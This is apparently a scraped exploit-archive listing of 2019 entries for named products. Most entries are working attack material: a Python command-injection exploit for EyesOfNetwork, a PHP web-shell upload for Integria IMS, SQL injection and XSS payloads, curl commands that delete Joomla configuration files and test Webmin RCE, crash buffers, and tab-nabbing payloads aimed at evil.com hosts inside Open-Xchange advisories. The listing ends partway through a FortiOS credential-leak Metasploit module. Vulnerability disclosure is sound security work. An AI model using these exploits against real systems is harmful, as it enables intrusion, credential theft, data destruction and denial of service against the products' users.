↧
Adobe Acrobat Reader DC For Windows JP2 Stream Double-Free
↧
EyesOfNetwork 5.1 Remote Command Execution
EyesOfNetwork version 5.1 authenticated remote command execution exploit.
2259218a24e60e9c5d94503f3acca3d0# Exploit Title: EyesOfNetwork 5.1 - Authenticated Remote Command Execution
# Google Dork: N/A
# Date: 2019-08-14
# Exploit Author: Nassim Asrir
# Vendor Homepage: https://www.eyesofnetwork.com/
# Software Link: https://www.eyesofnetwork.com/?page_id=48&lang=fr
# Version: 5.1 < 5.0
# Tested on: Windows 10
# CVE : N/A
#About The Product:
''' EyesOfNetwork ("EON") is the OpenSource solution combining a pragmatic usage of ITIL processes and a technological interface allowing their workaday application.
EyesOfNetwork Supervision is the first brick of a range of products targeting to assist IT managment and gouvernance.
EyesOfNetwork Supervision provides event management, availability, problems and capacity.
#Technical Analysis:
EyesOfNetwork allows Remote Command Execution via shell metacharacters in the module/tool_all/ host field.
By looking into tools/snmpwalk.php we will find the vulnerable part of code:
else{
$command = "snmpwalk -c $snmp_community -v $snmp_version $host_name";
}
in this line we can see as the attacker who control the value of "$host_name" variable .
And after that we have the magic function "popen" in the next part of code.
$handle = popen($command,'r');
echo "<p>";<br />
while($read = fread($handle,100)){
echo nl2br($read);
flush();
}
pclose($handle);
And now we can see the use of "popen" function that execute the $command's value and if we set a shell metacharacters ";" in the end of the command we will be able to execute OS command.'''
#Exploit
import requests
import optparse
import sys
import bs4 as bs
commandList = optparse.OptionParser('usage: %prog -t https://target:443 -u admin -p pwd -c "ls"')
commandList.add_option('-t', '--target', action="store",
help="Insert TARGET URL",
)
commandList.add_option('-c', '--cmd', action="store",
help="Insert command name",
)
commandList.add_option('-u', '--user', action="store",
help="Insert username",
)
commandList.add_option('-p', '--pwd', action="store",
help="Insert password",
)
options, remainder = commandList.parse_args()
if not options.target or not options.cmd or not options.user or not options.pwd:
commandList.print_help()
sys.exit(1)
url = options.target
cmd = options.cmd
user = options.user
pwd = options.pwd
with requests.session() as c:
link=url
initial=c.get(link)
login_data={"login":user,"mdp":pwd}
page_login=c.post(str(link)+"/login.php", data=login_data)
v_url=link+"/module/tool_all/select_tool.php"
v_data = {"page": "bylistbox", "host_list": "127.0.0.1;"+cmd, "tool_list": "tools/snmpwalk.php", "snmp_com": "mm", "snmp_version": "2c", "min_port": "1", "max_port": "1024", "username": '', "password": '', "snmp_auth_protocol": "MD5", "snmp_priv_passphrase": '', "snmp_priv_protocol": '', "snmp_context": ''}
page_v=c.post(v_url, data=v_data)
my=bs.BeautifulSoup(page_v.content, "lxml")
for textarea in my.find_all('p'):
final = textarea.get_text()
print final
↧
↧
Integria IMS 5.0.86 Arbitrary File Upload
Integria IMS version 5.0.86 suffers from an arbitrary file upload vulnerability that allows for remote command execution.
e5093a3f5921350e30fd4ec8f1a6f85e# Exploit Title: Integria IMS 5.0.86 - Arbitrary File Upload
# Date: 2019-08-16
# Exploit Author: Greg.Priest
# Vendor Homepage: https://integriaims.com/
# Software Link: https://sourceforge.net/projects/integria/files/5.0.86/
# Version: Integria IMS 5.0.86
# Tested on: Windows
# CVE : N/A
# ---------------------------------------------------------------------------------------
# http://10.61.184.30/integria//index.php?sec=wiki&sec2=operation/wiki/wiki&action=upload
# ---------------------------------------------------------------------------------------
# [Description]
# filemgr.php in Integria IMS 5.0.86, allows arbitrary file upload.
# index.php?sec=wiki&sec2=operation/wiki/wiki&action=upload
# ---------------------------------------------------------------------------------------
POST /integria/index.php?sec=wiki&sec2=operation/wiki/wiki&action=upload HTTP/1.1
Host: 10.61.184.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: hu-HU,hu;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://10.61.184.30/integria/index.php?sec=wiki&sec2=operation/wiki/wiki&action=upload
Content-Type: multipart/form-data; boundary=---------------------------30333176734664
Content-Length: 374
Connection: close
Cookie: PHPSESSID=1d31d410e9b85f1e9aaa53a2616a550e
Upgrade-Insecure-Requests: 1
-----------------------------30333176734664
Content-Disposition: form-data; name="curdir"
-----------------------------30333176734664
Content-Disposition: form-data; name="file"; filename="whoami.php"
Content-Type: application/octet-stream
<?php
$output = shell_exec('whoami');
echo "<pre>$output</pre>";
?>
-----------------------------30333176734664--
↧
Web Wiz Forums 12.01 SQL Injection
Web Wiz Forums version 12.01 suffers from a remote SQL injection vulnerability.
02a536280795c152ac1767403e0624fc# Exploit Title: Web Wiz Forums 12.01 - 'PF' SQL Injection
# Date: 2019-09-16
# Exploit Author: n1x_ [MS-WEB]
# Vendor Homepage: https://www.webwiz.net/web-wiz-forums/forum-downloads.htm
# Version: 12.01
# Tested on Windows
# Vulnerable parameter: PF (member_profile.asp)
# GET Request
GET /member_profile.asp?PF=10' HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: wwf10lVisit=LV=2019%2D08%2D16+14%3A55%3A50; wwf10sID=SID=1784%2Da7facz6e8757e8ae7b746221064815; ASPSESSIONIDQACRQTCC=OKJNGKBDFFNFKFDJMFIFPBLD
Connection: close
Upgrade-Insecure-Requests: 1
↧
Joomla JS Jobs 1.2.6 Arbitrary File Delete
Joomla JS Jobs component version 1.2.6 suffers from an arbitrary file deletion vulnerability.
4aaff4d9cb1016b3b2f73bbdf2679d2f# Exploit Title: Joomla! component com_jsjobs 1.2.6 - Arbitrary File Deletion
# Dork: inurl:"index.php?option=com_jsjobs"
# Date: 2019-08-16
# Exploit Author: qw3rTyTy
# Vendor Homepage: https://www.joomsky.com/
# Software Link: https://www.joomsky.com/5/download/1
# Version: 1.2.6
# Tested on: Debian/nginx/joomla 3.9.0
# Vulnerability details:
# This vulnerability is caused when processing custom userfield.
File: site/models/job.php
Function: storeJob
Line: 1240
-------------------------------------
1215 //custom field code start
1216 $customflagforadd = false;
1217 $customflagfordelete = false;
1218 $custom_field_namesforadd = array();
1219 $custom_field_namesfordelete = array();
1220 $userfield = $this->getJSModel('customfields')->getUserfieldsfor(2);
1221 $params = array();
1222 $forfordelete = '';
1223
1224 foreach ($userfield AS $ufobj) {
1225 $vardata = '';
1226 if($ufobj->userfieldtype == 'file'){
1227 if(isset($data[$ufobj->field.'_1']) && $data[$ufobj->field.'_1'] == 0){
1228 $vardata = $data[$ufobj->field.'_2'];
1229 }else{
1230 $vardata = $_FILES[$ufobj->field]['name'];
1231 }
1232 $customflagforadd=true;
1233 $custom_field_namesforadd[]=$ufobj->field;
1234 }else{
1235 $vardata = isset($data[$ufobj->field]) ? $data[$ufobj->field] : '';
1236 }
1237 if(isset($data[$ufobj->field.'_1']) && $data[$ufobj->field.'_1'] == 1){
1238 $customflagfordelete = true;
1239 $forfordelete = $ufobj->field;
1240 $custom_field_namesfordelete[]= $data[$ufobj->field.'_2']; //No check.
1241 }
...snip...
1323 // new
1324 //removing custom field
1325 if($customflagfordelete == true){
1326 foreach ($custom_field_namesfordelete as $key) {
1327 $res = $this->getJSModel('common')->uploadOrDeleteFileCustom($row->id,$key ,1,2); //!!!
1328 }
1329 }
File: site/models/common.php
Function: uploadOrDeleteFileCustom
Line: 851
-------------------------------------
748 $path = $base . '/' . $datadirectory;
749 if (!file_exists($path)) { // create user directory
750 $this->makeDir($path);
751 }
752 $isupload = false;
753 $path = $path . '/data';
754 if (!file_exists($path)) { // create user directory
755 $this->makeDir($path);
756 }
757 if($for == 3 )
758 $path = $path . '/jobseeker';
759 else
760 $path = $path . '/employer';
761
762 if (!file_exists($path)) { // create user directory
763 $this->makeDir($path);
764 }
...snip...
843 } else { // DELETE FILES
844 if ($isdeletefile == 1) {
845 if($for == 3){
846 $userpath = $path . '/'.$datafor.'_' . $resumeid . '/customfiles/';
847 }else{
848 $userpath = $path . '/'.$datafor.'_' . $id . '/customfiles/';
849 }
850 $file = $userpath.$field;
851 unlink($file); //!!!
852 }
853 return 1;
854 }
855 }
#####################################
#PoC:
#####################################
# If an administrator has added custom userfield 'ufield926' as field type 'file', attacker are can trigger this vulnerability by send a following requests.
$> curl -X POST -i -H 'Cookie: VALID_SESSION_ID=VALID_SESSION_ID' -F 'options=com_jsjobs' -F 'task=job.savejob' -F 'id=' -F 'enforcestoppublishjob=666' -F 'startpublishing=2019-08-16' -F 'stoppublishing=2019-08-16' -F 'description=woot' -F 'title=woot' -F 'ufield926=@./valid_image.jpg' -F 'VALID_FORM_TOKEN_FROM_FORMJOB=1'"http://localhost/index.php"
$> curl -X POST -i -H 'Cookie: VALID_SESSION_ID=VALID_SESSION_ID' -F 'options=com_jsjobs' -F 'task=job.savejob' -F 'id=666' -F 'enforcestoppublishjob=666' -F 'startpublishing=2019-08-16' -F 'stoppublishing=2019-08-16' -F 'description=woot' -F 'title=woot' -F 'ufield926_1=1' -F 'ufield926_2=../../../../../configuration.php' -F 'VALID_FORM_TOKEN_FROM_FORMJOB=1'"http://localhost/index.php"
↧
↧
GetGo Download Manager 6.2.2.3300 Denial Of Service
GetGo Download Manager version 6.2.2.3300 suffers from a denial of service vulnerability.
e23572f028f1de4e1321a3d92de0af8d# Exploit Title : GetGo Download Manager 6.2.2.3300 - Denial of Service
# Date: 2019-08-15
# Author - Malav Vyas
# Vulnerable Software: GetGo Download Manager 6.2.2.3300
# Vendor Home Page: www.getgosoft.com
# Software Link: http://www.getgosoft.com/getgodm/
# Tested On: Windows 7 (64Bit), Windows 10 (64Bit)
# Attack Type : Remote
# Impact : DoS
# Co-author - Velayuthm Selvaraj
# 1. Description
# A buffer overflow vulnerability in GetGo Download Manager 6.2.2.3300 and
# earlier could allow Remote NAS HTTP servers to perfor DOS via a long response.
# 2. Proof of Concept
import socket
from time import sleep
host = "192.168.0.112"
port = 80
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((host, port))
sock.listen(1)
print "\n[+] Listening on %d ..." % port
cl, addr = sock.accept()
print "[+] Connected to %s" % addr[0]
evilbuffer = "A" * 6000
buffer = "HTTP/1.1 200 " + evilbuffer + "\r\n"
print cl.recv(1000)
cl.send(buffer)
print "[+] Sending buffer: OK\n"
sleep(30)
cl.close()
sock.close()
↧
GNU patch Command Injection / Directory Traversal
↧
Open-Xchange OX Guard Cross Site Scripting / Signature Validation
Open-Xchange OX Guard versions 7.10.2 and below suffer from a cross site scripting vulnerability. Open-Xchange OX Guard versions 7.10.1 and below, 2.10.2 and below suffer from a signature validation vulnerability.
8a4509aba45a3f48bf32078dfdbc3fd1Dear subscribers,
we're sharing our latest advisory with you and like to thank everyone who contributed in finding and solving those vulnerabilities. Feel free to join our bug bounty programs (appsuite, dovecot, powerdns) at HackerOne.
Yours sincerely,
Martin Heiland, Open-Xchange GmbH
Product: OX Guard
Vendor: OX Software GmbH
Internal reference: 65132 (Bug ID)
Vulnerability type: Cross-Site Scripting (CWE-80)
Vulnerable version: 7.10.2 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.3-rev48, 7.8.4-rev59, 7.10.0-rev32, 7.10.1-rev14, 7.10.2-rev5
Vendor notification: 2019-05-09
Solution date: 2019-06-13
Public disclosure: 2019-08-15
CVE reference: CVE-2018-9997
CVSS: 5.4 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)
Vulnerability Details:
Curly brackets can be used to bypass XSS sanitization in HTML mail and other HTML attachments. A variation of the original issue has been found thats based on incorrect global eventhandler blacklist entries.
Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.).
Steps to reproduce:
1. Create a HTML mail with curly brackets that disguise event handlers in CSS
2. Make a App Suite user open the malicious mail
Proof of concept:
<div style=width:100%;height:10px;font:\"'/{/onMouseLeave=alert(1)//></div>
Solution:
We updated the list of blacklisted event handlers to close this bypass, operators may add a workaround by updating "globaleventhandlers.list" and change the incorrect handler "onmounseleave" to "onmouseleave".
--
Internal reference: 64992 (Bug ID)
Vulnerability type: Data validation fault (CWE-34)
Vulnerable version: 7.10.1 and earlier, 2.10.2 and earlier
Vulnerable component: guard, backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version (guard): 2.8.0-rev22, 2.10.1-rev7
Fixed version (backend): 7.8.4-rev59, 7.10.1-rev14
Vendor notification: 2019-05-03
Solution date: 2019-06-13
Public disclosure: 2019-08-15
Researcher Credits: Jens Müller, Marcus Brinkmann, Damian Poddebniak, Hanno Böck, Sebastian Schinzel, Juraj Somorovsky, and Jörg Schwenk
CVE reference: CVE-2019-11521
CVSS: 5.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)
Vulnerability Details:
Internal evaluation revealed that OX Guard is vulnerable to a subset of techniques used to display a valid signature from the identity of a trusted communication partner located in the mail header, although the crafted email is actually signed by an attacker. Our discoveries are based on work of a team of researchers, publishing these spoofing techniques under the "Johnny You Are Fired" project name.
Risk:
Recipients of signed PGP mail could be fooled to assume the mail originates from a trusted source rather than an attacker. This would elevate the mails trust level and potentially ease social-engineering attacks.
Steps to reproduce:
1. Create mails that contain valid signatures but originate from a different source
Proof of concept:
https://github.com/RUB-NDS/Johnny-You-Are-Fired/tree/master/04-id
Solution:
We improved validation and make sure mail with valid signatures is only evaluated to be "trusted" if the sender matches the signature issuer. We also extended our API to provide more information about a specific signature to let clients add checks and handle invalid signature information.
↧
Open-Xchange OX App Suite Content Spoofing / Cross Site Scripting
Open-Xchange OX App Suite suffers from a content spoofing, cross site scripting, and information disclosure vulnerabilities. Versions affected vary depending on the vulnerability.
e4f984f70b4911993c1fb35b6018270aDear subscribers,
we're sharing our latest advisory with you and like to thank everyone who contributed in finding and solving those vulnerabilities. Feel free to join our bug bounty programs (appsuite, dovecot, powerdns) at HackerOne.
Yours sincerely,
Martin Heiland, Open-Xchange GmbH
Product: OX App Suite
Vendor: OX Software GmbH
Internal reference: 64680 (Bug ID)
Vulnerability type: Content Spoofing (CWE-451)
Vulnerable version: 7.10.1
Vulnerable component: frontend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.10.1-rev12
Vendor notification: 2019-04-15
Solution date: 2019-05-09
Public disclosure: 2019-08-15
Researcher Credits: zee_shan
CVE reference: CVE-2019-11521
CVSS: 6.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N)
Vulnerability Details:
Appointment titles are rendered as hyperlink but were missing a protection against "tab nabbing".
Risk:
When following a hyperlink to a malicious website, the original tab location (OX App Suite) could be replaced with a URL chosen by the attacker. This can be exploited to trick users to re-enter credentials to a seemingly legitimate website and as a result take over accounts.
Steps to reproduce:
1. Create a appointment invitation that contains a link to a malicious website including a blank "target" attribute
2. Make the user accept the invitation and click the hyperlink at the appointments title
3. Provide a effective exploit to overwrite the users original URL and fake a login page
Proof of concept:
Appointment title content:
<a href="//www.evil.com/window.html" target="_blank">Click Me! :-)
Payload:
<script>
window.opener.location.replace('//www.evil-fakelogin.com/');
</script>
Solution:
We extended the usage of existing protection mechanisms (blankshield) to this case.
---
Internal reference: 64682 (Bug ID)
Vulnerability type: Cross-Site Scripting (CWE-80)
Vulnerable version: 7.10.0 and 7.10.1
Vulnerable component: frontend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.10.0-rev31, 7.10.1-rev12
Vendor notification: 2019-04-15
Solution date: 2019-05-13
Public disclosure: 2019-08-15
Researcher Credits: zee_shan
CVE reference: CVE-2019-11522
CVSS: 5.4 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)
Vulnerability Details:
When replying to a HTML E-Mail with specific payload, that payload could be executed as script code. The user would have to have HTML composing enabled to exploit this vulnerability. This vulnerability could happen as browsers incorrectly "fix" HTML content as demonstrated by @kinugawamasato for Google Search.
Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.).
Steps to reproduce:
1. Create an E-Mail with malicious content and deliver it to the user
2. Make the user "reply" to the E-Mail
Proof of concept:
Test
<noscript><p class="xss">Another XSS!
<!-- --!
> <img src=x onerror=alert(document.domain)>
Solution:
We improved our filter and whitelisting mechanisms to block this kind of code from entering the browsers rendering engine.
---
Internal reference: 64703 (Bug ID)
Vulnerability type: Cross-Site Scripting (CWE-80)
Vulnerable version: 7.10.1
Vulnerable component: frontend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.10.1-rev12
Vendor notification: 2019-04-15
Solution date: 2019-05-13
Public disclosure: 2019-08-15
Researcher Credits: zee_shan
CVE reference: CVE-2019-11522
CVSS: 5.4 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)
Vulnerability Details:
When opening a embedded HTML E-Mail, sanitization mechanisms were not active.
Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.).
Steps to reproduce:
1. Create an E-Mail with malicious content and embed/attach it to another E-Mail
2. Make the user open to embedded E-Mail using OX App Suites "View" feature
Proof of concept:
<img src=x onerror=alert(document.domain)>
Solution:
We now use existing filtering mechanisms when processing embedded or attached E-Mail.
---
Affected product: OX App Suite
Internal reference: 62465 (Bug ID)
Vulnerability type: Information Exposure (CWE-200)
Vulnerable version: 7.6.3 and later
Vulnerable component: driverestricted, backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version (driverestricted): 7.6.3-rev4, 7.8.3-rev8, 7.8.4-rev6, 7.10.0-rev5, 7.10.1-rev4
Fixed version (backend): 7.6.3-rev46, 7.8.3-rev56, 7.8.4-rev52, 7.10.0-rev31, 7.10.1-rev12
Vendor notification: 2019-01-14
Solution date: 2019-05-13
Public disclosure: 2019-08-15
CVE reference: CVE-2019-11806
CVSS: 3.3 (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)
Vulnerability Details:
Bundles that contain private keys and passwords for OX Drive related push services were deployed without proper file-system permissions. We also fixed default file-system permissions for related configuration files that potentially contain passwords set by the operator.
Risk:
A user with non privileged system-level access could access and extract the bundles (JAR files) and analyze their byte-code. From that its possible to extract both the private key for APN certificates as well as their encryption password and GCM key/secret pairs. Extracting this does not open a specific attack vector but we consider the information confidential and our handling did not adhere to our standards with that kind of information.
Steps to reproduce:
1. Use a non privileged user account to access an OX App Suite Middleware machine
2. Check file permissions for "driverestricted" bundles that contain secret keys and passwords
Solution:
We updated file-system level permissions for such bundles and configuration files.
↧
↧
MediaWiki OAuth2 Client 0.3 Cross Site Request Forgery
MediaWiki OAuth2 Client version 0.3 suffers from a cross site request forgery vulnerability.
46e749ce553be96c1690bf02ed0d0f80[CVE-2019-15150] CSRF in MediaWiki extension OAuth2 Client 0.3
Happy Sunday everyone.
A security bulletin for you all.
Software:
--------
MediaWiki OAuth2 Client (https://github.com/Schine/MW-OAuth2Client)
Description:
----------
MediaWiki implementation of the PHP League's OAuth2 Client, to allow MediaWiki
to act as a client to any OAuth2 server.
Not Affeted:
------------
0.2 and earlier.
Affected Versions:
---------------
0.3
Fixed Versions:
-------------
0.4
Problem:
--------
In the OAuth2 Client extension 0.3 for MediaWiki, a CSRF vulnerability
exists due to the OAuth2 state parameter not being checked in the callback
function.
Per OAuth 2.0 spec, the authorization code grant flow is susceptible to CSRF
and clickjacking attacks unless an appropriate "state" parameter is chosen and
verified.[1][2][3]
Although the software correctly generates an unguessable state value and sets
it in the URL to the OAuth 2.0 server, it fails to actually check/validate the
parameter in the callback against what it previously selected.
The regression was introduced when switching underlying vendor code.[4]
Impact:
-------
As described in the OAuth 2.0 RFC spec, this opens the site relying on the
software up to clickjacking and CSRF attacks.[1]
A successful attack can lead to loss of integrity of the user/victim.
Solution:
---------
Update callback function to verify presence and correct `state` value as
previously chosen prior to initiating the OAuth2 flow[5], as done in v0.4
release.[6]
Timeline:
---------
2019-08-17: Bug discovered
2019-08-17: CVE requested, assigned, privately disclosed to maintainer,
bugfix/patch authored
2019-08-18: Maintainer acknowledged, patched version 0.4 is released
Credit:
-------
Discovery by me.
Thanks to the maintainer Schine GmbH. for a quick acknowledgement and release.
References:
-----------
[1]: https://tools.ietf.org/html/rfc6749#section-10.12
[2]: https://auth0.com/docs/protocols/oauth2/mitigate-csrf-attacks
[3]: https://auth0.com/docs/protocols/oauth2/oauth-state
[4]: https://github.com/Schine/MW-OAuth2Client/commit/7188d6c8d359d41c6974c19b2c0907653bab8f6e
[5]: https://github.com/Schine/MW-OAuth2Client/commit/6a4fe4500ddd72ad4e826d9d63b2d69512bd10d1
[6]: https://github.com/Schine/MW-OAuth2Client/releases/tag/v0.4
--
Best Regards,
Justin Bull
PGP Fingerprint: E09D 38DE 8FB7 5745 2044 A0F4 1A2B DEAA 68FD B34C
↧
Webmin Remote Comman Execution
Webmin unauthenticated remote command execution exploit that identifies whether or not a target is vulnerable.
d3f8ab6c772881a15aae824b15be9760#!/bin/sh
#
# CVE-2019-15107 Webmin Unauhenticated Remote Command Execution
# based on Metasploit module https://www.exploit-db.com/exploits/47230
# Original advisory: https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
# Alternative advisory (spanish): https://blog.nivel4.com/noticias/vulnerabilidad-de-ejecucion-de-comandos-remotos-en-webmin
#
# Fernando A. Lagos B. (Zerial)
# https://blog.zerial.org
# https://blog.nivel4.com
#
# The script sends a flag by a echo command then grep it. If match, target is vulnerable.
#
# Usage: sh CVE-2019-15107.sh https://target:port
# Example: sh CVE-2019-15107.sh https://localhost:10000
# output: Testing for RCE (CVE-2019-15107) on https://localhost:10000: VULNERABLE!
#
FLAG="f3a0c13c3765137bcde68572707ae5c0"
URI=$1;
echo -n "Testing for RCE (CVE-2019-15107) on $URI: ";
curl -ks $URI'/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=id|echo '$FLAG'&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: '$URI'/session_login.cgi'|grep $FLAG>/dev/null 2>&1
if [ $? -eq 0 ];
then
echo '\033[0;31mVULNERABLE!\033[0m'
else
echo '\033[0;32mOK! (target is not vulnerable)\033[0m'
fi
#EOF
↧
RAR Password Recovery 1.80 Denial Of Service
RAR Password Recovery version 1.80 suffers from a user name and registration code denial of service vulnerability.
c8006c83d8c82155250a442fd9ef4c2b# Exploit Title: RAR Password Recovery v1.80 Denial of Service Exploit
# Date: 16.08.2019
# Vendor Homepage:https://www.top-password.com/
# Software Link: https://www.top-password.com/download/RARPRSetup.exe
# Exploit Author: Achilles
# Tested Version: v1.80
# Tested on: Windows 7 x64
# Windows XP SP3
# 1.- Run python code :RAR Password Recovery.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open RAR Password Recovery and Click 'Register'
# 4.- Paste the content of EVIL.txt into the Field: 'User Name and Registration Code'
# 5.- Click 'OK' and you will see a crash.
#!/usr/bin/env python
buffer = "\x41" * 6000
try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
↧
Kimai 2 Cross Site Scripting
Kimai version 2 suffers from a persistent cross site scripting vulnerability.
d467918811040b33c88487e63e4fa7b0# Exploit Title: Kimai 2- persistent cross-site scripting (XSS)
# Date: 07/15/2019
# Exploit Author: osamaalaa
# Vendor Homepage: [link]
# Software Link: https://github.com/kevinpapst/kimai2
# Fixed on Github : https://github.com/kevinpapst/kimai2/pull/962
# Version: 2
1-Normal user will try to add timesheet from this link http://localhost/index.php/en/timesheet/create
2-Add this payload "><svg/onload=alert('xss')> in the description
3-Save The changes
4-refresh and we have alert pop up!
The Request POC :
POST /index.php/en/timesheet/create HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 392
Connection: close
Referer: http://localhost
Cookie: PHPSESSID=auehoprhqk3qspncs5s08ucobv
timesheet_edit_form[begin]=2019-08-17 13:02×heet_edit_form[end]=2019-08-18 00:00×heet_edit_form[customer]=12×heet_edit_form[project]=24×heet_edit_form[activity]=27×heet_edit_form[description]= "><svg/onload=alert('xss')>×heet_edit_form[tags]=×heet_edit_form[_token]=19Owg2YgIMPFUcEP9NVibhqEpKwkwhVt5j-BTJysyK0
↧
↧
Neo Billing 3.5 Cross Site Scripting
Neo Billing version 3.5 suffers from a persistent cross site scripting vulnerability.
7d47b4f46e7a051cb9a4041134f8126a# Exploit Title: Neo Billing 3.5 - Stored Cross Site Scripting Vulnerability
# Date: 18.8.2019.
# Exploit Author: n1x_ [MS-WEB]
# Vendor Homepage: https://codecanyon.net/item/neo-billing-accounting-invoicing-and-crm-software/20896547
# Version: 3.5
# CWE : CWE-79
[Description]
# Neo Billing os an accounting, invoicing and CRM PHP script, with over 500 installations.
# Due to improper input fields data filtering, version 3.5 (and possibly previous versions), are affected by a stored XSS vulnerability.
[Proof of Concept]
# 1. Authorization as customer (regular user account) [//host/neo/crm/user/login]
# 2. Closing an input field tag and injecting code into 'Subject' or 'Description' text fields [//host/neo/crm/tickets/addticket]
# 3. The code is stored [//host/neo/crm/tickets] ∨ [//host/neo/crm/tickets/thread/?id=ticketid]
[Example paylods]
# Example payload: "><img src="x" onerror="alert('XSS');">
# Example payload: "><script>alert(document.cookie)</script>
[POST Request]
POST /neo/crm/tickets/addticket HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: //host/neo/crm/tickets/addticket
Content-Type: multipart/form-data; boundary=---------------------------899768029113033755249127523
Content-Length: 694
Cookie: __cfduid=d99e93624fe63d5aa953bf59cd28cdafe1566123585; ci_sessions=nel35vfb2hi5f9tt29l43ogn36hdmilj
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------899768029113033755249127523
Content-Disposition: form-data; name="title"
"><script>alert('XSS')</script>
-----------------------------899768029113033755249127523
Content-Disposition: form-data; name="content"
<p>"><script>alert('XSS')</script><br></p>
-----------------------------899768029113033755249127523
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream
-----------------------------899768029113033755249127523
Content-Disposition: form-data; name="userfile"; filename=""
Content-Type: application/octet-stream
-----------------------------899768029113033755249127523--
↧
Mandos Encrypted File System Unattended Reboot Utility 1.8.8
The Mandos system allows computers to have encrypted root file systems and at the same time be capable of remote or unattended reboots. The computers run a small client program in the initial RAM disk environment which will communicate with a server over a network. All network communication is encrypted using TLS. The clients are identified by the server using an OpenPGP key that is unique to each client. The server sends the clients an encrypted password. The encrypted password is decrypted by the clients using the same OpenPGP key, and the password is then used to unlock the root file system.
dc129218c58f33b7c68e4cb7a34ecd6a↧
YouPHPTube 7.2 SQL Injection
YouPHPTube version 7.2 suffers from a remote SQL injection vulnerability in userCreate.json.php.
0c5a7e8e6f6f45c7826e5a19a22f0dea# Exploit Title: YouPHPTube < 7.3 SQL Injection
# Google Dork: /
# Date: 19.08.2019
# Exploit Author: Fabian Mosch, r-tec IT Security GmbH
# Vendor Homepage: https://www.youphptube.com/
# Software Link: https://github.com/YouPHPTube/YouPHPTube
# Version: < 7.3
# Tested on: Linux/Windows
# CVE : CVE-2019-14430
The parameters "User" as well as "pass" of the user registration function are vulnerable to SQL injection vulnerabilities. By submitting an HTTP POST request to the URL "/objects/userCreate.json.php" an attacker can access the database and read the hashed credentials of an administrator for example.
Example Request:
POST /objects/userCreate.json.php HTTP/1.1
Host: vulnerablehost.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
[SomeHeaders and Cookies]
user=tes'INJECTHERE&pass=test'INJECTHERE &email=test%40example.com&name=test&captcha=xxxxx
Methods for DB-Extraction are:
- Boolean-based blind
- Error-based
- AND/OR time-based blind
The vulnerability was fixed with this commit:
https://github.com/YouPHPTube/YouPHPTube/commit/891843d547f7db5639925a67b7f2fd66721f703a
↧
FortiOS 5.6.7 / 6.0.4 Credential Disclosure
This Metasploit module exploits FortiOS versions 5.6.3 through 5.6.7 and 6.0.0 through 6.0.4 to leverage a credential disclosure vulnerability by reading the /dev/cmdb/sslvpn_websession file.
956f30465640700e922f5cf3e4a9bdf6# Exploit Title: FortiOS Leak file - Reading login/passwords in clear text.
# Google Dork: intext:"Please Login" inurl:"/remote/login"
# Date: 17/08/2019
# Exploit Author: Carlos E. Vieira
# Vendor Homepage: https://www.fortinet.com/
# Software Link: https://www.fortinet.com/products/fortigate/fortios.html
# Version: This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ).
# Tested on: 5.6.6
# CVE : CVE-2018-13379
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Post::File
def initialize(info = {})
super(update_info(info,
'Name' => 'SSL VPN FortiOs - System file leak',
'Description' => %q{
